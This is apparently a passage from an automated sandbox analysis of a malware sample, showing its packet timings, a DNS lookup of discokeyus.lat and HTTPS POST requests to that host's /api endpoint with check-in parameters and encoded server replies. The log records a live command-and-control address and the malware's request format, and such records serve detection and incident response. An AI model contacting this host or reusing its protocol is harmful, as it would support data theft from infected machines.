                                                                                              Dec 18, 2024 20:54:22.721822977 CET44349733104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:24.060672998 CET44349733104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:24.060830116 CET49733443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:24.066598892 CET49733443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:24.066615105 CET44349733104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:24.067615986 CET44349733104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:24.068958998 CET49733443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:24.069125891 CET49733443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:24.069165945 CET44349733104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:25.271780968 CET44349733104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:25.271991968 CET44349733104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:25.272109032 CET49733443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:25.272212029 CET49733443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:25.272229910 CET44349733104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:25.835374117 CET49734443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:25.835426092 CET44349734104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:25.835515976 CET49734443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:25.849277020 CET49734443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:25.849307060 CET44349734104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:27.078337908 CET44349734104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:27.078444004 CET49734443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:27.080307007 CET49734443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:27.080317974 CET44349734104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:27.080751896 CET44349734104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:27.082448006 CET49734443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:27.082633972 CET49734443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:27.082659960 CET44349734104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:27.082753897 CET49734443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:27.082763910 CET44349734104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:30.952018023 CET44349734104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:30.952296019 CET44349734104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:30.952384949 CET49734443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:30.955409050 CET49734443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:30.955452919 CET44349734104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:31.654572010 CET49737443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:31.654627085 CET44349737104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:31.654721975 CET49737443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:31.655102015 CET49737443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:31.655118942 CET44349737104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:32.981477976 CET44349737104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:32.981623888 CET49737443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:32.985044003 CET49737443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:32.985058069 CET44349737104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:32.985403061 CET44349737104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:32.986757040 CET49737443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:32.986895084 CET49737443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:32.986901999 CET44349737104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:37.518337965 CET44349737104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:37.518440962 CET44349737104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:37.518501997 CET49737443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:37.518620014 CET49737443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:37.518646002 CET44349737104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:38.047904015 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:38.047950029 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:38.048048019 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:38.048433065 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:38.048449039 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.281224966 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.281395912 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.285387993 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.285409927 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.285851955 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.295090914 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.295926094 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.295970917 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.296135902 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.296169043 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.296400070 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.296432972 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.296617985 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.296647072 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.296818018 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.296854019 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.297012091 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.297043085 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.297056913 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.297070980 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.297234058 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.297254086 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.297275066 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.297436953 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.297463894 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.343353033 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.346319914 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.346359015 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.346389055 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.346412897 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.346435070 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.346443892 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:39.346518993 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:39.346533060 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:45.548615932 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:45.548721075 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:45.548777103 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:45.548954964 CET49742443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:45.548979998 CET44349742104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:45.558614016 CET49743443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:45.558697939 CET44349743104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:45.558871984 CET49743443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:45.559325933 CET49743443192.168.2.4104.21.21.99
                                                                                              Dec 18, 2024 20:54:45.559360027 CET44349743104.21.21.99192.168.2.4
                                                                                              Dec 18, 2024 20:54:46.297827005 CET49743443192.168.2.4104.21.21.99

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 18, 2024 20:54:14.474132061 CET6446153192.168.2.41.1.1.1
                                                                                              Dec 18, 2024 20:54:14.993315935 CET53644611.1.1.1192.168.2.4

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 18, 2024 20:54:14.474132061 CET192.168.2.41.1.1.10x2f1bStandard query (0)discokeyus.latA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 18, 2024 20:54:14.993315935 CET1.1.1.1192.168.2.40x2f1bNo error (0)discokeyus.lat104.21.21.99A (IP address)IN (0x0001)false
                                                                                              Dec 18, 2024 20:54:14.993315935 CET1.1.1.1192.168.2.40x2f1bNo error (0)discokeyus.lat172.67.197.170A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • discokeyus.lat

                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449730104.21.21.994437736C:\Users\user\Desktop\k6A01XaeEn.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 19:54:16 UTC261OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: discokeyus.lat
                                                                                              2024-12-18 19:54:16 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-12-18 19:54:16 UTC1036INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 19:54:16 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=037aj54shpbqlqkm2dlp0u6g57; expires=Sun, 13-Apr-2025 13:40:55 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I%2B6OrQT3UiECel1LTTb8LnDCDM0rg6pKRFsjecMvr4MmUe4A6qlMzNZk3dJ2oQ2whlVcwqHFf2VicL9tabR0MiXDfOEJJRohVsdiIJOiTKP%2BaOm0LMLJPOeNB8uWUc%2FjtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f41b42d5d1a7cf0-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1819&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1568206&cwnd=230&unsent_bytes=0&cid=558296f71d17e37f&ts=732&x=0"
                                                                                              2024-12-18 19:54:16 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-18 19:54:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449731104.21.21.994437736C:\Users\user\Desktop\k6A01XaeEn.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 19:54:18 UTC262OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 42
                                                                                              Host: discokeyus.lat
                                                                                              2024-12-18 19:54:18 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=
                                                                                              2024-12-18 19:54:19 UTC1042INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 19:54:18 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=bo1hsj5br2lp3pegn1iabdnmh9; expires=Sun, 13-Apr-2025 13:40:57 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61OOeMa8wcCYTB9omVCW%2Fqxmb%2BotnMqfMLpAQ4JTf%2FvwhzCn4kPELv0V%2BvFzo%2FMLyElrX8jZRX%2BYRveQIyMlcIqPaBDQLeU55UKofjkUDH1h3vAmNF2PtdlxSx8ooPiPfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f41b439ba2342d4-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1600&rtt_var=740&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=940&delivery_rate=1350601&cwnd=247&unsent_bytes=0&cid=bb6fca8b289f2b1b&ts=798&x=0"
                                                                                              2024-12-18 19:54:19 UTC327INData Raw: 34 39 31 63 0d 0a 58 53 6b 5a 6a 41 59 34 7a 63 67 44 69 31 52 36 2b 4e 6c 4d 76 58 61 61 75 4a 6d 67 37 44 72 59 36 36 37 36 4b 2b 66 4a 6a 6b 55 6d 43 32 2b 75 50 41 7a 68 36 6e 44 75 64 6b 43 4d 71 7a 6e 59 57 72 6a 5a 2f 59 4c 57 58 4c 6d 48 33 5a 38 48 78 62 2f 6a 5a 32 64 50 65 4f 42 31 58 65 48 71 5a 76 4e 32 51 4b 4f 69 62 74 67 59 75 49 4b 37 78 59 5a 59 75 59 66 4d 6d 30 43 49 75 65 49 6d 4e 55 56 2b 35 47 4e 62 71 61 6c 76 35 6a 45 66 6e 62 67 6d 30 78 2f 33 30 50 53 43 77 42 69 39 6b 59 7a 41 43 61 71 73 2b 69 51 51 53 47 72 6e 4a 45 58 68 73 79 48 75 4f 6c 6a 43 2b 79 33 59 46 50 62 65 2f 63 75 45 55 72 43 50 7a 5a 35 42 6c 36 44 6f 4c 54 56 4c 66 65 56 70 55 72 32 6b 5a 65 45 36 47 5a 65 34 62 70 46 55 2f 38 4b 37 6d 73 34 4c 69 49 72 64 69
                                                                                              Data Ascii: 491cXSkZjAY4zcgDi1R6+NlMvXaauJmg7DrY6676K+fJjkUmC2+uPAzh6nDudkCMqznYWrjZ/YLWXLmH3Z8Hxb/jZ2dPeOB1XeHqZvN2QKOibtgYuIK7xYZYuYfMm0CIueImNUV+5GNbqalv5jEfnbgm0x/30PSCwBi9kYzACaqs+iQQSGrnJEXhsyHuOljC+y3YFPbe/cuEUrCPzZ5Bl6DoLTVLfeVpUr2kZeE6GZe4bpFU/8K7ms4LiIrdi
                                                                                              2024-12-18 19:54:19 UTC1369INData Raw: 4e 6a 4b 2b 4d 47 61 56 61 76 4a 30 39 5a 51 78 61 7a 67 5a 32 63 4c 66 65 42 6c 56 36 2b 34 61 65 49 39 48 59 69 77 4a 39 49 5a 2b 4e 66 78 7a 59 31 59 76 59 50 47 6c 30 4f 42 70 75 45 68 50 30 73 37 6f 43 52 64 74 2b 6f 35 71 52 55 64 69 72 77 69 79 56 62 43 6d 75 53 4d 6c 78 69 39 68 59 7a 41 43 59 32 75 37 79 51 30 52 48 6a 6d 62 30 69 76 75 47 66 6b 4d 77 71 63 76 69 44 56 46 2b 72 51 39 63 53 4e 55 62 47 41 79 5a 39 4e 78 65 57 73 49 43 63 4c 49 36 35 46 56 36 53 6d 61 2f 34 32 57 49 58 31 4e 35 38 54 39 4a 71 6a 67 6f 70 5a 76 6f 6a 49 6c 6b 65 42 70 2b 6f 70 4d 6b 52 39 35 47 52 64 70 61 4a 70 36 44 73 54 6c 62 73 72 30 68 44 2b 31 76 72 48 7a 68 62 36 6a 74 54 59 45 63 57 46 36 79 51 74 43 55 37 74 61 6c 53 6f 76 43 48 32 65 41 48 61 76 43 4b 66
                                                                                              Data Ascii: NjK+MGaVavJ09ZQxazgZ2cLfeBlV6+4aeI9HYiwJ9IZ+NfxzY1YvYPGl0OBpuEhP0s7oCRdt+o5qRUdirwiyVbCmuSMlxi9hYzACY2u7yQ0RHjmb0ivuGfkMwqcviDVF+rQ9cSNUbGAyZ9NxeWsICcLI65FV6Sma/42WIX1N58T9JqjgopZvojIlkeBp+opMkR95GRdpaJp6DsTlbsr0hD+1vrHzhb6jtTYEcWF6yQtCU7talSovCH2eAHavCKf
                                                                                              2024-12-18 19:54:19 UTC1369INData Raw: 72 49 68 42 6a 30 79 63 75 41 43 64 33 72 33 54 41 30 43 55 37 74 61 6c 53 6f 76 43 48 32 65 41 48 61 76 43 4b 66 54 4c 6a 58 38 38 65 4c 56 37 75 44 77 70 31 44 69 61 50 69 4a 43 31 45 66 2b 35 6f 55 71 57 6e 62 2b 30 2b 45 5a 47 77 4b 4e 38 56 38 70 71 31 67 6f 6c 41 2b 74 47 4d 72 45 36 4a 70 75 4e 6c 43 6b 68 31 34 47 4e 4d 37 37 55 76 38 48 59 66 6c 76 74 32 6e 78 6a 78 32 76 44 49 69 6c 69 39 68 4d 6d 62 54 6f 61 6d 36 79 30 78 54 48 2f 69 62 56 65 70 71 6d 62 74 4d 77 71 66 73 69 4c 54 56 4c 61 61 2f 4e 72 4f 41 50 71 6d 79 34 35 4b 71 71 6a 39 4c 6e 39 55 4e 66 63 6b 58 61 50 71 4f 61 6b 78 48 5a 4b 77 4b 4e 63 55 36 74 2f 31 79 59 39 53 76 49 6a 42 6c 45 2b 46 71 75 77 68 4d 30 74 38 36 58 5a 49 71 71 78 7a 34 33 5a 57 32 72 77 32 6e 30 79 34 37
                                                                                              Data Ascii: rIhBj0ycuACd3r3TA0CU7talSovCH2eAHavCKfTLjX88eLV7uDwp1DiaPiJC1Ef+5oUqWnb+0+EZGwKN8V8pq1golA+tGMrE6JpuNlCkh14GNM77Uv8HYflvt2nxjx2vDIili9hMmbToam6y0xTH/ibVepqmbtMwqfsiLTVLaa/NrOAPqmy45Kqqj9Ln9UNfckXaPqOakxHZKwKNcU6t/1yY9SvIjBlE+FquwhM0t86XZIqqxz43ZW2rw2n0y47
                                                                                              2024-12-18 19:54:19 UTC1369INData Raw: 59 75 59 62 46 6c 30 47 4e 70 4f 4d 6a 4d 55 31 39 34 32 46 56 70 62 68 70 35 7a 73 54 6c 62 41 38 33 78 6e 38 31 76 2f 4b 68 56 4c 36 78 34 79 66 55 63 58 7a 72 42 49 79 52 48 76 74 63 68 71 77 35 48 69 70 4d 52 54 61 34 32 37 54 47 76 6a 56 39 38 36 46 55 4c 75 46 77 70 39 4d 6a 4b 50 6b 4e 54 35 50 63 2b 39 71 56 61 36 75 5a 4f 77 79 48 35 36 39 49 5a 39 61 75 4e 33 6a 67 74 59 59 6c 61 37 35 32 6d 69 2f 36 2f 4e 70 4a 67 74 38 34 69 51 43 37 36 5a 69 35 54 34 58 6e 4c 49 69 31 52 33 7a 31 76 44 47 67 6c 47 2f 6a 38 32 64 54 49 53 76 34 43 30 35 53 48 6a 68 61 31 57 6e 36 69 2b 70 4d 51 44 61 34 32 37 36 41 2f 50 55 2f 59 4b 52 46 71 50 4a 79 35 51 4a 33 65 76 67 4c 6a 6c 4e 66 75 4a 6c 58 4b 65 76 61 65 30 33 48 70 79 34 49 64 73 52 2b 64 58 2f 7a 6f
                                                                                              Data Ascii: YuYbFl0GNpOMjMU1942FVpbhp5zsTlbA83xn81v/KhVL6x4yfUcXzrBIyRHvtchqw5HipMRTa427TGvjV986FULuFwp9MjKPkNT5Pc+9qVa6uZOwyH569IZ9auN3jgtYYla752mi/6/NpJgt84iQC76Zi5T4XnLIi1R3z1vDGglG/j82dTISv4C05SHjha1Wn6i+pMQDa4276A/PU/YKRFqPJy5QJ3evgLjlNfuJlXKevae03Hpy4IdsR+dX/zo
                                                                                              2024-12-18 19:54:19 UTC1369INData Raw: 7a 5a 56 43 6c 36 7a 6a 49 7a 68 48 66 65 46 69 57 36 71 67 62 65 34 7a 45 35 57 33 62 70 46 55 2f 38 4b 37 6d 73 35 32 73 5a 72 62 6d 30 65 4f 76 66 64 6e 49 41 56 69 72 6d 4e 57 37 2f 49 68 36 6a 30 54 6e 72 73 69 33 78 44 31 32 75 6e 4e 69 56 2b 7a 67 74 36 53 54 6f 4b 67 35 43 77 77 54 57 6e 69 61 6b 69 71 75 48 4f 70 65 46 69 64 6f 32 36 48 56 4d 37 64 36 39 4b 4e 47 6f 75 66 7a 34 35 43 69 4b 65 73 4f 48 46 53 4f 2b 6c 6f 47 76 66 71 5a 2b 59 2f 47 35 57 36 4a 39 4d 5a 2f 64 50 2b 77 34 68 63 73 49 50 4d 6e 6b 2b 45 72 75 59 6b 50 6b 46 79 36 57 78 64 72 4c 67 68 70 33 59 66 67 76 74 32 6e 7a 33 2f 79 50 58 53 7a 6b 66 30 6b 49 79 66 52 63 58 7a 72 43 4d 31 52 48 2f 70 61 46 79 71 72 47 7a 6f 4f 52 6d 61 74 43 72 55 48 66 37 62 39 73 65 44 58 4b 69
                                                                                              Data Ascii: zZVCl6zjIzhHfeFiW6qgbe4zE5W3bpFU/8K7ms52sZrbm0eOvfdnIAVirmNW7/Ih6j0Tnrsi3xD12unNiV+zgt6SToKg5CwwTWniakiquHOpeFido26HVM7d69KNGoufz45CiKesOHFSO+loGvfqZ+Y/G5W6J9MZ/dP+w4hcsIPMnk+EruYkPkFy6WxdrLghp3Yfgvt2nz3/yPXSzkf0kIyfRcXzrCM1RH/paFyqrGzoORmatCrUHf7b9seDXKi
                                                                                              2024-12-18 19:54:19 UTC1369INData Raw: 64 33 72 37 43 30 36 51 58 62 74 61 31 6d 39 71 32 66 37 4e 68 57 51 71 53 54 55 45 66 58 58 39 73 47 49 58 72 47 46 33 70 46 4a 68 71 43 73 61 58 39 4d 59 36 34 38 47 6f 79 39 64 2b 4d 78 46 49 79 77 4c 39 77 43 39 63 71 37 6a 4d 35 4a 76 5a 69 4d 77 46 2b 56 76 4f 73 34 63 56 49 37 36 57 67 61 39 2b 70 6e 34 44 41 66 6e 4c 55 38 32 68 4c 33 31 66 4c 4c 69 6c 43 35 69 63 69 63 54 6f 43 6f 34 43 77 34 53 48 54 71 62 56 53 6d 70 53 47 6e 64 68 2b 43 2b 33 61 66 4e 65 50 5a 39 38 2f 4f 52 2f 53 51 6a 4a 39 46 78 66 4f 73 4b 7a 46 4f 65 2b 52 69 58 71 71 73 61 2b 77 32 45 35 6d 30 4b 74 6b 51 39 39 72 77 79 34 39 65 76 34 50 48 6e 6b 53 47 72 65 70 6e 63 51 74 38 39 69 51 43 37 34 70 36 35 44 6f 66 32 71 52 67 78 6c 54 2f 31 72 75 61 7a 6c 4f 32 6a 63 75 59
                                                                                              Data Ascii: d3r7C06QXbta1m9q2f7NhWQqSTUEfXX9sGIXrGF3pFJhqCsaX9MY648Goy9d+MxFIywL9wC9cq7jM5JvZiMwF+VvOs4cVI76Wga9+pn4DAfnLU82hL31fLLilC5icicToCo4Cw4SHTqbVSmpSGndh+C+3afNePZ98/OR/SQjJ9FxfOsKzFOe+RiXqqsa+w2E5m0KtkQ99rwy49ev4PHnkSGrepncQt89iQC74p65Dof2qRgxlT/1ruazlO2jcuY
                                                                                              2024-12-18 19:54:19 UTC1369INData Raw: 52 6e 45 45 78 74 37 55 74 5a 76 71 4d 68 70 33 59 66 6a 50 74 32 6e 79 71 34 79 50 6a 53 6a 56 65 72 74 34 7a 41 55 4c 76 72 35 7a 45 34 57 33 6a 34 62 31 65 6a 75 31 2b 70 62 6b 7a 49 36 58 79 4e 52 75 65 61 35 50 33 41 47 4c 76 4a 6c 4b 46 51 78 62 32 73 66 32 30 46 4f 2f 77 6b 41 75 2f 74 59 76 73 6b 48 70 6d 74 4c 5a 67 71 78 76 33 74 79 49 6c 49 76 5a 37 44 32 41 66 46 70 4b 78 2f 42 67 74 79 36 58 39 4c 75 61 64 78 37 6e 59 6e 31 50 73 32 6e 30 79 34 37 2f 6a 4d 67 46 2b 73 6d 49 47 2f 58 34 2b 73 2f 43 41 6f 52 44 75 67 4a 46 7a 76 38 6a 4b 6e 64 68 79 4c 2b 33 61 50 52 71 4f 50 71 4a 58 65 43 71 58 48 31 64 68 66 78 66 4f 2b 61 58 39 5a 4f 37 59 6b 48 61 79 34 63 2b 38 31 44 70 6e 38 45 4f 45 7a 34 74 66 39 31 5a 39 6d 68 49 37 57 6c 55 2b 53 75
                                                                                              Data Ascii: RnEExt7UtZvqMhp3YfjPt2nyq4yPjSjVert4zAULvr5zE4W3j4b1eju1+pbkzI6XyNRuea5P3AGLvJlKFQxb2sf20FO/wkAu/tYvskHpmtLZgqxv3tyIlIvZ7D2AfFpKx/Bgty6X9Luadx7nYn1Ps2n0y47/jMgF+smIG/X4+s/CAoRDugJFzv8jKndhyL+3aPRqOPqJXeCqXH1dhfxfO+aX9ZO7YkHay4c+81Dpn8EOEz4tf91Z9mhI7WlU+Su
                                                                                              2024-12-18 19:54:19 UTC1369INData Raw: 61 63 4f 4e 6f 47 75 48 71 5a 36 6c 75 53 4e 54 37 4b 73 35 55 6f 49 71 70 6d 64 73 4c 37 64 6d 65 68 77 65 63 36 2f 70 6e 5a 78 6b 31 72 6e 59 61 39 2b 6f 6d 36 69 51 4b 6e 4c 67 34 33 46 50 47 35 4e 7a 4d 69 56 6d 73 6d 64 75 58 64 37 75 2b 37 79 6b 78 54 47 33 2f 4a 42 54 76 70 53 47 78 44 31 6a 53 2b 78 47 52 56 4f 43 61 6f 34 4b 37 57 37 53 48 79 34 35 59 79 49 7a 69 49 44 35 64 61 2f 6c 72 47 75 48 71 5a 36 6c 75 53 74 54 37 4b 73 35 55 6f 49 71 70 6d 64 73 4c 37 64 6d 65 68 77 65 63 36 2f 70 6e 5a 78 6b 31 72 6e 59 61 39 2b 6f 6d 36 69 51 4b 6e 4c 67 34 33 46 50 47 35 4e 7a 4d 69 56 6d 73 6d 64 75 58 42 71 75 64 7a 52 6b 42 58 6e 6a 67 61 6c 32 35 75 79 47 6e 64 68 66 61 34 78 65 66 58 4c 6a 6c 74 59 4b 57 47 4f 4c 4a 2b 5a 74 48 69 36 7a 36 4e 6e
                                                                                              Data Ascii: acONoGuHqZ6luSNT7Ks5UoIqpmdsL7dmehwec6/pnZxk1rnYa9+om6iQKnLg43FPG5NzMiVmsmduXd7u+7ykxTG3/JBTvpSGxD1jS+xGRVOCao4K7W7SHy45YyIziID5da/lrGuHqZ6luStT7Ks5UoIqpmdsL7dmehwec6/pnZxk1rnYa9+om6iQKnLg43FPG5NzMiVmsmduXBqudzRkBXnjgal25uyGndhfa4xefXLjltYKWGOLJ+ZtHi6z6Nn
